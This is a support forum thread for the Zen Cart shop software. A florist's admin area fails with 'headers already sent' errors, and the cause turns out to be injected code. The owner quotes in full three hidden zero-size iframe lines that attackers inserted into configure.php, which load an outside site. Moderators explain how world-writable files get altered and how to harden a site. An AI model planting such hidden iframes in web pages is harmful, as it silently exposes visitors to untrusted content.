Error in Admin Ver .6

[gardengate]

I am still on the Version before last. My store has been working fine at http://www.findaflorist.org/sendflowers/ but starting today when I try to go to the admin area http://www.findaflorist.org/sendflowers/admin I get the following error and cannot proceed.
The error is:
Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/configure.php:88) in /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/includes/functions/sessions.php on line 102

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/configure.php:88) in /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/includes/functions/sessions.php on line 102

Warning: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/configure.php:88) in /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/init_includes/init_templates.php on line 36

Warning: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/configure.php:88) in /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/functions/general.php on line 34

Can anyone help. Thanks

[gardengate]

Oh I forgot to mention I have no line 88 in configure.php

[Ajeh]

er ... you should ...

Line 88 is blank and line 89 is the closing php tag of ?>

[DrByte]

This FAQ should help:
https://www.zen-cart.com/tutorials/index.php?article=87

[gardengate]

In my case line 86 is blank. Line 87 is the closing tag and the end. I also noticed an additional 3 lines in my configure.php that I did not put they refer to a site free20.com that it is not my site Was this a hacking attempt. I deleted those line but the error continued. These 3 line were
<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=secownz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=secownz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=secownz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

How were they able to insert these lines

[gardengate]

Thank you guys after deleting the extra line I left a hard return. I now removed it and my admin is back functional.
Does anyone know how the html codes got there I thought I followed all the security measures listed. Any Idea. Con you also tell what they acomplished by doing this?

[DrByte]

If you leave files as read-write, ie: chmod 777 then if your hosting server is compromised and a hacker gets onto the server from *anywhere* (not necessarily your account), they can search the server for files that are read-write, and then edit them. And they usually just write a small program to do that. You're not a specific target usually. Just a victim.

Key: make good backups, regularly, and only leave files/folders writable if *needed*, and then only *when* needed, if possible.

Here are some guidelines for keeping yourself safe:
http://www.zen-cart.com/wiki/index.p...ing_From_Hacks